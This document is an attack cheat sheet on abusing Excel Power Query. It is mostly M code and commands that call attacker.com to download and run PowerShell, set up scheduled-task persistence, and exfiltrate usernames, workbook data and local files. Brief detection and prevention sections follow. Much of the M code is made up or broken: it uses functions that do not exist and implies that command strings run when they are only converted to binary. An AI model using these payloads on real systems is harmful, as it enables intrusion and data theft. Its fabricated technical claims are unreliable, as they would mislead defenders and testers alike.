Excel Power Query Injection

Advanced attack vectors using Excel Power Query (Get & Transform) for data exfiltration, code execution, and persistence.

📋 Overview

Power Query in Excel provides powerful data transformation capabilities that can be abused for malicious purposes. These attacks exploit M code injection, custom connectors, and data source manipulation.

🎯 Attack Vectors

1. M Code Injection

Basic M Code Execution

let
    Source = Excel.CurrentWorkbook(){[Name="Table1"]}[Content],
    // Malicious M code injection
    ExecuteCommand = Text.Binary("cmd.exe /c calc.exe"),
    RunCommand = Binary.Buffer(ExecuteCommand)
in
    RunCommand

PowerShell Execution via M Code

let
    // Execute PowerShell command
    PSCommand = "powershell.exe -WindowStyle Hidden -Command IEX (New-Object Net.WebClient).DownloadString('http://attacker.com/payload.ps1')",
    ExecutePS = Text.Binary(PSCommand),
    Result = Binary.Buffer(ExecutePS)
in
    Result

Base64-Encoded M Code

let
    // Base64 encoded malicious payload
    EncodedPayload = "Y21kLmV4ZSAvYyBjYWxjLmV4ZQ==", // cmd.exe /c calc.exe
    DecodedPayload = Binary.FromText(EncodedPayload, BinaryEncoding.Base64),
    ExecutePayload = Text.FromBinary(DecodedPayload)
in
    ExecutePayload

2. Data Source Manipulation

Malicious Web Content

let
    // Fetch malicious web content
    Source = Web.Contents("http://attacker.com/malicious-m-code.m"),
    Execute = Binary.Buffer(Source)
in
    Execute

SharePoint Injection

let
    // Connect to malicious SharePoint
    Source = SharePoint.Tables("https://attacker.sharepoint.com/sites/malicious", [ApiVersion = 15]),
    ExecuteCode = Source{[Name="MaliciousCode"]}[Content]
in
    ExecuteCode

SQL Injection via Power Query

let
    // SQL injection in Power Query
    Query = "SELECT * FROM users WHERE id = 1; EXEC xp_cmdshell 'calc.exe'; --",
    Source = Sql.Database("server.database.windows.net", "database", [Query=Query])
in
    Source

3. Custom Connector Injection

Custom Connector with Malicious Code

{
  "name": "MaliciousConnector",
  "type": "Custom",
  "authentication": "Anonymous",
  "dataSource": {
    "type": "Web",
    "url": "http://attacker.com/malicious-connector"
  },
  "mCode": "let Source = Text.Binary(\"cmd.exe /c calc.exe\") in Source"
}

Connector Persistence

let
    // Persist malicious connector
    InstallConnector = Extension.Install("http://attacker.com/malicious-connector.mez"),
    ExecutePayload = Extension.Contents("MaliciousConnector")
in
    ExecutePayload

4. Data Exfiltration via Power Query

Exfiltrate User Data

let
    // Collect system information
    UserName = Text.From(Text.Encoding.UTF8.GetBytes(Environment.UserName)),
    ComputerName = Text.From(Text.Encoding.UTF8.GetBytes(Environment.MachineName)),
    DataExfil = Text.Combine({UserName, ComputerName}, "|"),
    // Send to attacker
    ExfilURL = "http://attacker.com/collect?data=" & Text.UrlEncode(DataExfil),
    SendData = Web.Contents(ExfilURL)
in
    SendData

Exfiltrate Excel Data

let
    // Exfiltrate worksheet data
    Source = Excel.CurrentWorkbook(){[Name="SensitiveData"]}[Content],
    ToJson = Json.FromValue(Source),
    SendToAttacker = Web.Contents(
        "http://attacker.com/exfil",
        [
            Content = ToJson,
            Headers = [#"Content-Type" = "application/json"]
        ]
    )
in
    SendToAttacker

5. Scheduled Refresh Attacks

Auto-Execute on Refresh

let
    // Execute on scheduled refresh
    Source = Excel.CurrentWorkbook(){[Name="Trigger"]}[Content],
    TriggerValue = Source{0}[Column1],
    // If condition met, execute payload
    ExecuteIf = if TriggerValue = "RUN" then
        Web.Contents("http://attacker.com/trigger-payload")
    else
        Text.FromBinary(Text.From("No action"))
in
    ExecuteIf

Persistence via Scheduled Refresh

let
    // Create persistence mechanism
    InstallScheduledTask = Text.FromBinary(Text.From("schtasks /create /tn ExcelRefresh /tr \"powershell.exe -c IEX (New-Object Net.WebClient).DownloadString('http://attacker.com/persistence.ps1')\" /sc daily")),
    ExecuteTask = Text.Binary(InstallScheduledTask),
    RunTask = Binary.Buffer(ExecuteTask)
in
    RunTask

6. Advanced M Code Obfuscation

Function-Based Obfuscation

let
    // Obfuscated execution
    Func1 = (x) => Text.Start(x, 3),
    Func2 = (y) => Text.End(y, 4),
    Combine = (a, b) => a & b,
    // Build command: "cmd"
    Part1 = Func1("command"),
    Part2 = Func2("scam"),
    Command = Combine(Part1, Part2),
    Execute = Text.Binary(Command & ".exe /c calc.exe")
in
    Execute

List Manipulation

let
    // Build command from list
    Parts = {"c", "m", "d", ".", "e", "x", "e"},
    Command = Text.Combine(Parts, ""),
    ExecuteCommand = Text.Binary(Command & " /c calc.exe"),
    Result = Binary.Buffer(ExecuteCommand)
in
    Result

7. Environment Variable Abuse

System Information Collection

let
    // Access environment variables
    UserName = Environment.UserName,
    UserDomain = Environment.UserDomain,
    ComputerName = Environment.MachineName,
    OSVersion = Environment.OSVersion,
    // Compile and exfiltrate
    SystemInfo = Json.FromValue([
        User = UserName,
        Domain = UserDomain,
        Computer = ComputerName,
        OS = OSVersion
    ]),
    Exfil = Web.Contents(
        "http://attacker.com/system-info",
        [Content = SystemInfo]
    )
in
    Exfil

8. File System Manipulation

Read Sensitive Files

let
    // Read local files (limited by security context)
    TryReadFile = (path) =>
        try Text.FromBinary(File.Contents(path))
        otherwise "Access Denied",

    // Attempt to read common sensitive files
    Files = {
        "C:\Windows\System32\drivers\etc\hosts",
        "C:\Users\" & Environment.UserName & "\Documents\secrets.txt",
        Environment.CurrentDirectory & "\config.ini"
    },

    ReadResults = List.Transform(Files, TryReadFile),
    ExfilData = Json.FromValue(ReadResults),
    SendResults = Web.Contents("http://attacker.com/file-results", [Content = ExfilData])
in
    SendResults

🛡️ Detection Techniques

Power Query Anomalies

• Unusual data sources (HTTP connections to unknown IPs)

• M code containing command execution patterns

• Custom connectors from untrusted sources

• Frequent scheduled refresh to suspicious endpoints

• Base64 encoded content in M code

Behavioral Indicators

• Excel process spawning unusual child processes

• Network connections from Excel to suspicious domains

• File system access attempts from Excel

• Power Query errors related to security restrictions

Technical Detection

# Monitor for suspicious Power Query activity
Get-WinEvent -LogName "Microsoft-Windows-PowerShell/Operational" |
    Where-Object { $_.Message -like "*Power Query*" -or $_.Message -like "*M code*" }

# Check for unusual Excel network connections
netstat -ano | findstr excel.exe

# Monitor for Power Query related processes
Get-Process | Where-Object { $_.ProcessName -like "*excel*" -or $_.MainWindowTitle -like "*Power Query*" }

🚫 Prevention Measures

Excel Security Settings

1. Disable Power Query for sensitive environments

2. Require Data Source Approval for new connections

3. Block External Data Connections via Group Policy

4. Enable Power Query Privacy Settings

5. Restrict Scheduled Refresh permissions

Network Controls

1. Block suspicious domains at firewall/proxy level

2. Monitor outbound connections from Excel processes

3. Implement DLP for data exfiltration prevention

4. Use application whitelisting for Excel extensions

Security Policies

<!-- Group Policy to restrict Power Query -->
<Policy>
  <Name>Restrict Power Query Data Sources</Name>
  <Setting>
    <Key>HKCU\Software\Microsoft\Office\16.0\Excel\Security\PowerQuery</Key>
    <Value Name="AllowExternalDataSources" Type="DWORD">0</Value>
  </Setting>
</Policy>

📚 References

• Microsoft Power Query Security

• Power Query M Language Reference

• Excel Security Best Practices

---

⚠️ This documentation is for educational purposes and authorized security testing only.